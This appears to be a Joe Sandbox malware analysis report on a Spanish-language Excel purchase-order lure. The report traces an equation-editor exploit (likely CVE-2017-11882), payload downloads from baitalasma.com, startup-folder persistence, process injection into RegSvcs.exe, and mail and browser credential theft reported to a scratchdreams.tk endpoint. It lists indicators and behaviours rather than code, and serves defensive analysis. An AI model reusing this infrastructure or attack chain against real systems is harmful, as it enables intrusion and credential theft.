                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01071204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,8_2_01071204
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01071806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_01071806
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_013B1204
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_013B1806
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information211
                  Scripting
                  2
                  Valid Accounts
                  2
                  Native API
                  211
                  Scripting
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  3
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts
                  2
                  Valid Accounts
                  3
                  Obfuscated Files or Information
                  Security Account Manager3
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder
                  21
                  Access Token Manipulation
                  1
                  Install Root Certificate
                  NTDS27
                  System Information Discovery
                  Distributed Component Object Model21
                  Input Capture
                  13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  Software Packing
                  LSA Secrets13
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder
                  1
                  DLL Side-Loading
                  Cached Domain Credentials131
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                  Valid Accounts
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
                  Virtualization/Sandbox Evasion
                  Network Sniffing1
                  Remote System Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                  Access Token Manipulation
                  Input Capture1
                  System Network Configuration Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task212
                  Process Injection
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1436299 Sample: Orden de compra 0001-002554... Startdate: 04/05/2024 Architecture: WINDOWS Score: 100 72 Multi AV Scanner detection for domain / URL 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 21 other signatures 2->78 9 EXCEL.EXE 6 11 2->9         started        11 wscript.exe 1 2->11         started        process3 signatures4 14 EQNEDT32.EXE 12 9->14         started        90 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->90 19 name.exe 2 11->19         started        process5 dnsIp6 56 baitalasma.com 38.242.255.115, 443, 49163, 49164 NATIXISUS United States 14->56 40 C:\Users\user\AppData\Roaming\negrett.exe, PE32 14->40 dropped 42 C:\Users\user\AppData\...\T76434567000[1].exe, PE32 14->42 dropped 58 Installs new ROOT certificates 14->58 60 Binary is likely a compiled AutoIt script file 14->60 62 Office equation editor establishes network connection 14->62 64 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->64 21 negrett.exe 6 14->21         started        66 Writes to foreign memory regions 19->66 68 Maps a DLL or memory area into another process 19->68 25 RegSvcs.exe 2 19->25         started        file7 signatures8 process9 dnsIp10 36 C:\Users\user\AppData\Local\...\name.exe, PE32 21->36 dropped 80 Binary is likely a compiled AutoIt script file 21->80 82 Machine Learning detection for dropped file 21->82 84 Found API chain indicative of sandbox detection 21->84 28 name.exe 3 21->28         started        50 104.21.67.152, 443, 49169, 49170 CLOUDFLARENETUS United States 25->50 52 reallyfreegeoip.org 25->52 54 2 other IPs or domains 25->54 86 Tries to steal Mail credentials (via file / registry access) 25->86 88 Tries to harvest and steal browser information (history, passwords, etc) 25->88 file11 signatures12 process13 file14 38 C:\Users\user\AppData\Roaming\...\name.vbs, data 28->38 dropped 92 Binary is likely a compiled AutoIt script file 28->92 94 Machine Learning detection for dropped file 28->94 96 Drops VBS files to the startup folder 28->96 98 3 other signatures 28->98 32 RegSvcs.exe 12 2 28->32         started        signatures15 process16 dnsIp17 44 checkip.dyndns.com 158.101.44.242, 49165, 49168, 80 ORACLE-BMC-31898US United States 32->44 46 reallyfreegeoip.org 172.67.177.134, 443, 49166, 49167 CLOUDFLARENETUS United States 32->46 48 checkip.dyndns.org 32->48 70 Tries to steal Mail credentials (via file / registry access) 32->70 signatures18

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Orden de compra 0001-00255454.xlam.xlsx56%VirustotalBrowse
                  Orden de compra 0001-00255454.xlam.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  Orden de compra 0001-00255454.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\negrett.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe100%Joe Sandbox ML
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  baitalasma.com4%VirustotalBrowse
                  reallyfreegeoip.org2%VirustotalBrowse
                  checkip.dyndns.com0%VirustotalBrowse
                  checkip.dyndns.org0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://baitalasma.com/T76434567000.exe0%Avira URL Cloudsafe
                  https://baitalasma.com/T76430%Avira URL Cloudsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/81.181.54.10440%Avira URL Cloudsafe
                  https://reallyfreegeoip.org/xml/81.181.54.1040%Avira URL Cloudsafe
                  https://baitalasma.com/T76434567000.exe0%Avira URL Cloudsafe
                  https://baitalasma.com/T76434567000.exeate0%Avira URL Cloudsafe
                  https://baitalasma.com/T76434567000.exe~x0%Avira URL Cloudsafe
                  https://scratchdreams.tk100%Avira URL Cloudmalware
                  https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
                  http://baitalasma.com/T76434567000.exej0%Avira URL Cloudsafe
                  https://baitalasma.com/T76434567000.exeqqC:0%Avira URL Cloudsafe
                  https://scratchdreams.tk18%VirustotalBrowse
                  https://scratchdreams.tk/_send_.php?TS16%VirustotalBrowse
                  https://baitalasma.com/0%Avira URL Cloudsafe
                  https://baitalasma.com/4%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  baitalasma.com
                  38.242.255.115
                  truetrueunknown
                  reallyfreegeoip.org
                  172.67.177.134
                  truefalseunknown
                  checkip.dyndns.com
                  158.101.44.242
                  truefalseunknown
                  checkip.dyndns.org
                  unknown
                  unknownfalseunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://baitalasma.com/T76434567000.exetrue
                  • Avira URL Cloud: safe
                  unknown
                  https://baitalasma.com/T76434567000.exetrue
                  • Avira URL Cloud: safe
                  unknown
                  https://reallyfreegeoip.org/xml/81.181.54.104false
                  • Avira URL Cloud: safe
                  unknown
                  http://checkip.dyndns.org/false
                  • URL Reputation: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://baitalasma.com/T7643EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.orgRegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002424000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.00000000024FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.org/xml/81.181.54.1044RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://baitalasma.com/T76434567000.exeateEQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://baitalasma.com/T76434567000.exe~xEQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://checkip.dyndns.org/qRegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://scratchdreams.tkRegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    http://reallyfreegeoip.orgRegSvcs.exe, 00000009.00000002.887723750.0000000002458000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002528000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.orgRegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://scratchdreams.tk/_send_.php?TSRegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 16%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    http://checkip.dyndns.comRegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://baitalasma.com/T76434567000.exejEQNEDT32.EXE, 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://baitalasma.com/T76434567000.exeqqC:EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://baitalasma.com/EQNEDT32.EXE, 00000002.00000003.526417075.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 4%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          38.242.255.115
                          baitalasma.comUnited States
                          36336NATIXISUStrue
                          104.21.67.152
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          158.101.44.242
                          checkip.dyndns.comUnited States
                          31898ORACLE-BMC-31898USfalse
                          172.67.177.134
                          reallyfreegeoip.orgUnited States
                          13335CLOUDFLARENETUSfalse
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1436299
                          Start date and time:2024-05-04 10:07:50 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 12m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Orden de compra 0001-00255454.xlam.xlsx
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winXLSX@13/16@20/4
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 103
                          • Number of non-executed functions: 182
                          Cookbook Comments:
                          • Found application associated with file extension: .xlsx
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Active ActiveX Object
                          • Scroll down
                          • Close Viewer
                          • Override analysis time to 17113.6306484895 for current running targets taking high CPU consumption
                          • Override analysis time to 34227.2612969791 for current running targets taking high CPU consumption
                          • Override analysis time to 68454.5225939582 for current running targets taking high CPU consumption
                          • Override analysis time to 136909.045187916 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
